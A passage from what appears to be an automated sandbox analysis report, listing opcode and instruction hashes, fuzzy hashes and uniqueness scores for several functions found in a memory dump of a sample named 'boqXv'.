                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: efd48e824809d7714b7f5889f8019f257ba9969d2e976bdfc85ca503285809e1
                                                • Instruction ID: 4cb9bcfd76064cf9d85ba132d026d7fe961ba6d589c552520e6421afb85f1cd5
                                                • Opcode Fuzzy Hash: efd48e824809d7714b7f5889f8019f257ba9969d2e976bdfc85ca503285809e1
                                                • Instruction Fuzzy Hash: 35F0F63BA242508BDB22CBE884912ACBFA1EA493117194096C807DF793D771E4DAC751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f4c871e2f3a51aca0e4f55d49e8b0ada3b30e4e99b81d8929a4c1e9ab61873e
                                                • Instruction ID: 7c992a66a68a22138ab6ba958132ce1858464cf49a745c7a196783fa3cc5f2c0
                                                • Opcode Fuzzy Hash: 9f4c871e2f3a51aca0e4f55d49e8b0ada3b30e4e99b81d8929a4c1e9ab61873e
                                                • Instruction Fuzzy Hash: D501267055014A9FCB14D7B8E980A9DBB79EB41324F0002B8C4554F2A5DE356F4ADB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b382d4dea85973e52a0763dcfc6c3b717b0902108560233732054ce44f074422
                                                • Instruction ID: edf10c9745ed9ced8886eaccc61adb9fdd821453ccbcab790e982ebe021fec40
                                                • Opcode Fuzzy Hash: b382d4dea85973e52a0763dcfc6c3b717b0902108560233732054ce44f074422
                                                • Instruction Fuzzy Hash: 68F03239B00108CFC718EB74E598B6D77B2EF88715F1180A8E90A9B3A4CF35AD42CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11c37e88b12ed142002fda07dffb70ad693956bb7fd9cd22582b86d7d99f90de
                                                • Instruction ID: 3a51926f5eb2d4e78a04ffeccb421e6ca211d61b911cea8a1cbae4081e9d4183
                                                • Opcode Fuzzy Hash: 11c37e88b12ed142002fda07dffb70ad693956bb7fd9cd22582b86d7d99f90de
                                                • Instruction Fuzzy Hash: ACF04430951109AFCB00EBB8F9909EDBBB9EB44314F5052B8C4099B354DF316F49DB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%